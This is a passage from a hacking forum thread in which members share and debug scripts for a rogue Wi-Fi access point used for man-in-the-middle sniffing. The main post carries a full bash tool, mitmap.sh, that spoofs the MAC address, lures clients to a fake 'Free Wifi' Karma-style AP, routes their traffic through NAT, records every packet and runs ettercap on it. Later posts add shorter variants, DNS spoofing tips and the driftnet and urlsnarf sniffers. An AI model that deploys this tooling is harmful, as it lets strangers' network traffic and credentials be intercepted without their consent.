
Thread: Rogue Accesspoint + MitM Sniffing tutorial

  1. #71

    Quote Originally Posted by Revelati:
    One last thing HM2075, I've been having some trouble getting that dnspoison program you used to work.
    Have you tried dnsspoof? Not having tried this thread's script and attack yet, I can't say for certain what dnspoison is supposed to do, but if it is simple DNS redirection for a MitM, then dnsspoof should work fine.

  2. #72

    Well guys, here is the script with all the kinks worked out of it. I do have to say that Deathray had the commands down perfectly; I only added a bit of extra logic and checks to what he already did, and added the commands for the digininja patched Madwifi kernel modules, since they are the ones I use the most and prefer over airbase-ng, just a matter of preference. Thanks again Deathray for such a good, simple and straight tutorial; it inspired me to write a good script. Before I forget, thanks for posting the comment on my blog. I was almost considering giving up on it, and your posting motivated me to keep writing it; it's those little things that count. Guys, test it and let me know if it works for you. Remember, as Deathray mentioned in his tutorial:
    • Have a working dhcpd.conf file with proper DNS servers specified
    • Have the latest version of aircrack-ng compiled
    • Have a wireless card that is supported by aircrack-ng for injection and that has proper patched modules in BT3

    link to download the script:

    http://www.darkoperator.com/mitmap.tar.gz

    Code:
    #!/bin/bash
    #=================================================
    #
    # FILE: mitmap.sh
    #
    # USAGE: ./mitmap.sh <options>
    #
    # DESCRIPTION: Script to launch a fake AP for Man In The Middle Attacks
    #
    # OPTIONS: Wireless card supported by Aircrack-ng for injection.
    #	   File with MAC addresses for filtering connections
    #	   Madwifi drivers patched with the DigiNinja Karma patch
    # BUGS: Only has been tested with Atheros, Realtek RTL8187 and Ralink 2750 cards.
    # NOTES: Latest SVN version of Aircrack-ng as well as the latest drivers must be used.
    # AUTHOR: carlos_perez(at)darkoperator.com
    # VERSION: 0.1
    # CREATED: 12/27/08
    # REVISION:
    #=================================================
    #Initialize Wireless interface variable
    IW=
    #Initialize interface to be routed to variable
    IE=
    #Initialize mode variable
    MODE=
    #Initialize SSID variable
    SSID="Free Wifi"
    #Initialize MAC filter file variable
    FILTER="/noexist"
    #Variable with number of arguments passed to the script
    NUM=$#
    #Variable with log file location for troubleshooting
    LOGFILE=/root/mitmap.log
    #Variable for log folder
    LOGFOLDER="/root/"
    #Atheros VAP name; when the wireless interface is ath0 the parent device wifi0 is used instead
    A1="ath0"
    #Variable for dhcpd configuration file
    DHCPDCONF="/etc/dhcpd.conf"
    #Interface that airmon-ng was actually started on, remembered so cleanup can stop it
    #(IW is later pointed at the at0 tap interface and is no longer the monitor interface)
    MONIF=
    #Capture ctrl-c and proceed to clean up any process left
    trap cleanup INT
    #Usage function for printing the help message
    function usage ()
    {
    	echo "Script for launching a Fake AP to perform a Man in The Middle Attack"
    	echo "Based on script and Tutorial by Deathray at http://forums.remote-exploit.org"
    	echo "Usage:"
    	echo "./mitmap.sh -m <mode> -i <wireless interface> -o <internet interface> <options>"
    	echo ""
    	echo "Modes:"
    	echo ""
    	echo "ap		:Access Point using Airbase-ng"
    	echo "apf		:Access Point using Airbase-ng and MAC Filtering"
    	echo "apa		:Access Point using Digininja patched Madwifi kernel modules"
    	echo "apaf		:Access Point using Digininja patched Madwifi Kernel modules and MAC filtering"
    	echo ""
    	echo "Options:"
    	echo ""
    	echo "-s <ssid> 	:SSID to use for the Fake AP"
    	echo "-f <text file>	:text file containing MAC addresses to use as filter one per line"
    	echo "-d <dhcpd conf>	:Dhcpd configuration file"
    	echo "-l <folder>	:Folder where the packet capture is written (default /root/)"
    	echo "-h 		: This help message"
    }
    #Airbase-ng Karma style interface initialization
    #Interface setup commands run in the foreground: running them in the background raced
    #with the following command (macchanger needs the interface down before it runs)
    function abngkinit ()
    {
    	if [ "$IW" = "$A1" ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1
    		MONIF="wifi0"
    		sleep 2
    	else
    		ifconfig $IW down >> $LOGFILE 2>&1
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		ifconfig $IW up >> $LOGFILE 2>&1
    		airmon-ng start $IW >> $LOGFILE 2>&1
    		MONIF="$IW"
    		sleep 2
    	fi
    	modprobe tun
    	echo -e "\033[1;32mstarting fake ap\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#especially on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	sleep 15
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for at0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	#from here on the tap interface created by airbase-ng is the one to configure
    	IW="at0"
    	ifconfig at0 10.0.0.1 netmask 255.255.255.0
    }
    #Airbase-ng Karma style interface initialization with MAC Address Filtering
    function abngkinitfiltered ()
    {
    	if [ ! -e "$FILTER" ]; then
    		echo -e "\033[1;31mFilter File does not exist: $FILTER\033[1;37m"
    		cleanup
    	fi
    	if [ "$IW" = "$A1" ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1
    		MONIF="wifi0"
    		sleep 2
    	else
    		ifconfig $IW down >> $LOGFILE 2>&1
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		ifconfig $IW up >> $LOGFILE 2>&1
    		airmon-ng start $IW >> $LOGFILE 2>&1
    		MONIF="$IW"
    		sleep 2
    	fi
    	modprobe tun
    	echo -e "\033[1;32mstarting fake ap with filtering\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" --clients "$FILTER" $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#especially on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	sleep 15
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for at0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	#from here on the tap interface created by airbase-ng is the one to configure
    	IW="at0"
    	ifconfig at0 10.0.0.1 netmask 255.255.255.0
    }
    #DigiNinja Atheros Karma interface initialization
    function mdwfkinit ()
    {
    	#Based on HD original karmetasploit scripts
    	find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -i wlanconfig {} destroy
    	echo Master Mode: `wlanconfig ath0 create wlandev wifi0 wlanmode ap`
    	macchanger -A ath0
    
    	# Enable KARMA mode
    	iwpriv ath0 karma 1
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m"
    		echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m"
    		cleanup
    	else
    		echo -e "\033[1;32mStarting Atheros Card in Karma Mode Successful\033[1;37m"
    	fi
    
    	# Configure the interface
    	iwconfig ath0 mode master
    	iwconfig ath0 channel 6
    	iwconfig ath0 essid "$SSID"
    	ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0
    }
    #DigiNinja Atheros Karma MAC Address Filtering
    function mdwfkinitfiltered ()
    {
    	if [ -e "$FILTER" ]; then
    		echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m"
    		#one MAC address per line; blank lines are skipped
    		while read -r M; do
    			[ -n "$M" ] && iwpriv ath0 addmac "$M"
    		done < "$FILTER"
    		iwpriv ath0 maccmd 1
    	else
    		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
    		echo $FILTER
    		#cleanup
    	fi
    }
    #Router with NAT Initialization
    function routerinit ()
    {
    	#Clear any dhcp leases that might have been left behind
    	echo > /var/state/dhcp/dhcpd.leases
    	#start dhcpd daemon with special configuration file. dhcpd forks into the background
    	#by itself; it must not be started with & here, or $? would only report that the
    	#background job was spawned and the check below could never fail
    	dhcpd -cf $DHCPDCONF $IW >> $LOGFILE 2>&1
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe DHCPD server could not be started, exiting\033[1;37m"
    		cleanup
    	else
    		echo -e "\033[1;32mDHCPD started successfully\033[1;37m"
    	fi
    	sleep 2
    	#capture all packets
    	echo -e "\033[1;32mStarting Packet capture to ${LOGFOLDER}apmitm.cap\033[1;37m"
    	tcpdump -ni $IW -s 0 -w "${LOGFOLDER}apmitm.cap" >/dev/null 2>&1 &
    	route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	iptables --table nat --delete-chain
    	iptables -P FORWARD ACCEPT
    	iptables -t nat -A POSTROUTING -o $IE -j MASQUERADE
    	echo "1" > /proc/sys/net/ipv4/ip_forward
    	ettercap -T -q -p -u -i $IW && cleanup
    }
    #Cleanup of all running processes
    function cleanup ()
    {
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	echo "0" > /proc/sys/net/ipv4/ip_forward
    	killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE 2>&1
    	echo > /var/state/dhcp/dhcpd.leases
    	#stop monitor mode on the interface it was started on (falls back to IW for the apa modes)
    	airmon-ng stop "${MONIF:-$IW}" >> $LOGFILE 2>&1
    	if [ "$MODE" = "apa" ] || [ "$MODE" = "apaf" ]; then
    		iwpriv ath0 maccmd 1 >> $LOGFILE 2>&1
    	fi
    	exit 1
    }
    #--------------------MAIN-----------------------
    #-h takes no argument, so it has no trailing colon in the option string
    while getopts ":m:i:f:s:l:o:d:h" options; do
      case $options in
        m ) MODE=$OPTARG;;
        i ) IW=$OPTARG;;
        f ) FILTER=$OPTARG;;
        s ) SSID=$OPTARG;;
        o ) IE=$OPTARG;;
        d ) DHCPDCONF=$OPTARG;;
        l ) LOGFOLDER=$OPTARG;;
        h ) usage
            exit 0;;
        \? | : ) usage
             exit 1;;
      esac
    done
    echo "finished processing options"
    if [[ -n "$MODE" && -n "$IW" && -n "$IE" ]]; then
    	case $MODE in
    	ap) abngkinit
    		routerinit;;
    	apf) abngkinitfiltered
    		routerinit;;
    	apa) mdwfkinit
    		routerinit;;
    	apaf) mdwfkinit
    		mdwfkinitfiltered
    		routerinit;;
    	* ) echo "Unknown mode: $MODE"
    		usage
    		exit 1;;
    	esac
    else
    	usage
    fi

  3. #73 (FrankFruter, Junior Member)

    This is what works for me when used with your dhcpd.conf file.

    Wifi card used for airbase: ath0 (Ubiquiti SRC 400 Mini PCI)
    Wifi card out to internet: eth1 (ipw2200 Mini PCI)

    Note: Also use the airbase option -I 600; this will make the ESSID visible.
    When using a Wifi card for the out interface, leave out the airbase options -P -C 30.


    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet: "
    read -e IFACE
    echo -n "Enter your airbase interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    airmon-ng start wifi0
    sleep 5
    modprobe tun
    #xterm -e airbase-ng -e "$ESSID" -I 600 -P -C 30 -v $WIFACE &
    xterm -e airbase-ng -e "$ESSID" -I 600 -v $WIFACE &
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    xterm -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    sleep 5
    echo "1" > /proc/sys/net/ipv4/ip_forward
    --------------------------------------------------------
    Starting the ettercap GUI after the script works well; it will not affect IP forwarding.
    ettercap > options > unoffensive
    sniff > unified sniffing > at0
    start > start sniffing

    /usr/local/driftnet/driftnet -i at0
    urlsnarf -i at0
    etc...

  4. #74

    http://dnspentest.sourceforge.net

    Go into the dir and type

    java ServerKernelMain <Server IP> <IP of fake response>

    It waits for UDP 53, then redirects.

    IP of fake response would be your IP address; server IP would be, I guess, the victim.

    Obviously in iptables you need to allow UDP 53 to flow, otherwise it won't make it.

  5. #75

    Originally posted by BadKarmaPR:
    Code:
    ettercap -T -q -p -u -i $IW && cleanup
    Is the -p option really needed?

  6. #76 (imported_Silver_Seven)

    Quote Originally Posted by =Tron=:
    Which part is it that is giving you problems under VMware, ie. how far have you managed to get? I still have yet to experience any real problems with using airbase-ng with my Alfa 500mw under VMware Fusion. I have updated to the latest version of aircrack-ng and am using MTU 1500 on the at0 interface, but apart from that I did not need to make any changes to the script provided by Deathray.
    Hey there Tron, thanx for the reply. Well, the bloody machine is doing the malformed packet thingy when I sniff on the wlan0 interface. Here is my setup as I am running the script hardcoded and manually on my ALPHA:

    # the pid file has to be read with a command substitution, "kill cat" would fail
    kill $(cat /var/run/dhcpd.pid)
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop wlan0
    ifconfig wlan0 down
    airmon-ng start wlan0
    modprobe tun
    konsole -e airbase-ng -e "Free_WiFi" -P -C 30 -v wlan0 &
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    I got sniffers all over the place here trying to figure it out. One of the sniffers on the VMware box running BT3 shows the client DHCP requesting on bootstrap over the at0 interface, obviously being forwarded from wlan0, which is good. This is also verified by wireshark on the client box trying to get the IP.

    Furthermore, you also see in wireshark the at0 10.0.0.1 router interface ARP broadcasting to see 10.0.0.254 clear / gratuitous on that local subnet. Then, the gw 10.0.0.1 issues an addy response of 10.0.0.254 at layer 3 to bind with the layer 2 MAC for the client. This too is good and makes me even happier to see this verified in the Konsole term windows.

    However, you never see the term windows from Deathray's script register the ACK. Nor do you see this activity at the client sniffer either. You only see that poor client continuing to ask for 0.0.0.0 to 255.255.255.255 DHCP request. Eventually, the stupid winblows box times out and gets handed the 169.x.x.x addy !!!

    So with that in mind, I sniff the wlan0 to see if the traffic is being forwarded from the at0 but I only see malformed packets. This makes me wonder if these are supposed to be the DHCP responses from the gw / ACK to the client giving him the logical addy to his physical MAC.

    Regardless, I have been up for ever working on other client issues too. You ever feel like you never sleep in this industry ........ I will try again tomorrow sometime or so and post some dumps/logs, unless you throw out some ingeniousness that fixes my issue as you often do. In my current state of mind (exhausted), I am whooooopppped, defeated and going to bed ........... :-(

    Thanx again brother and to all a good night !!!

  7. #77 (imported_Silver_Seven)

    To let it be known too .......... I have tried the 1500 MTU and removing the -P and -C options as I have an extensive Airespace network up in my lab upstairs !!!

  8. #78

    are you forwarding udp port 53?

  9. #79

    Quote Originally Posted by Silver_Seven:
    Hey there Tron, thanx for the reply. Well, the bloody machine is doing the malformed packet thingy when I sniff on the wlan0 interface. Here is my setup as I am running the script hardcoded and manually on my ALPHA:
    Your setup looks correct as far as I can see and I am guessing there is no problem with your dhcpd.conf either, seeing as the gateway will issue an IP within the range but the client simply refuses to accept it.

    Quote Originally Posted by Silver_Seven:
    However, you never see the term windows from Deathray's script register the ACK. Nor do you see this activity at the client sniffer either. You only see that poor client continuing to ask for 0.0.0.0 to 255.255.255.255 DHCP request. Eventually, the stupid winblows box times out and gets handed the 169.x.x.x addy !!!
    Are you trying to spoof an existing AP, i.e. would the client have any reason to try to obtain a previously used IP outside of 10.0.0.X? Have you tried to manually assign an IP on the client machine using an IP within the range? Adding the following iptables rule could also be helpful if this is the issue:
    Code:
    iptables -t nat -A PREROUTING -i at0 -j REDIRECT
    Quote Originally Posted by Silver_Seven:
    So with that in mind, I sniff the wlan0 to see if the traffic is being forwarded from the at0 but I only see malformed packets. This makes me wonder if these are supposed to be the DHCP responses from the gw / ACK to the client giving him the logical addy to his physical MAC.
    I get this when sniffing on the wlan0 interface under VMware as well, simply use the at0 interface instead as all traffic will go through this interface anyway.

    Quote Originally Posted by Silver_Seven:
    Regardless, I have been up for ever working on other client issues too. You ever feel like you never sleep in this industry
    Only all the time.
    -Monkeys are like nature's humans.

  10. #80

    Quote Originally Posted by level:
    Is the -p option really needed?
    What we are doing is telling it not to put the interface in promisc mode, since it is not necessary to do so; it is already seeing all the traffic.

    -p, --nopromisc
    Usually, ettercap will put the interface in promisc mode to sniff all the traffic on the wire. If you want to sniff only your connections, use this flag to NOT enable the promisc mode.
